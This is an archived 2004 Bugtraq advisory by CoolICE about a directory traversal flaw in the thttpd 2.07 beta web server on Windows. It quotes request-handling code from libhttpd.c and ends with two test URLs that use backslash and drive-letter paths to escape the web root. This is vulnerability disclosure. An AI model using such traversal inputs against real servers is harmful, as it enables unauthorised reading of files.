<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos network security services platform

Bugtraq: Bug@thttpd

Bug@thttpd

From: CoolICE <CoolICE_at_China.com>
Date: Wed, 4 Aug 2004 16:02:44 +0800

Application: thttpd
Vendors: http://www.acme.com/software/thttpd/
Version: 2.07 beta 0.4 10dec99
Platforms: Windows
Bug: Directory Traversal
Date: 2004-08-04
Author: CoolICE
e-mail: CoolICE#China.com
================
Content:
in libhttpd.c:
int
httpd_parse_request( httpd_conn* hc )
[...]
    if ( hc->decodedurl[0] != '/' )
        {
        httpd_send_err( hc, 400, httpd_err400title, httpd_err400form, "" );
        return -1;
        }

static int
really_start_request( httpd_conn* hc )
[...]
    if ( stat( hc->expnfilename, &hc->sb ) < 0 )
        {
        httpd_send_err( hc, 500, err500title, err500form, hc->encodedurl );
        return -1;
        }
------------------
TestCode:
http://localhost/%5c../test.ini
http://localhost/c:\test.ini
Received on Aug 04 2004

This message: [ Message body ]
Next message: vuln_at_hexview.com: "Clear text password exposure in Datakey's tokens and smartcards"
Previous message: Lionel Ferette: "Re: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]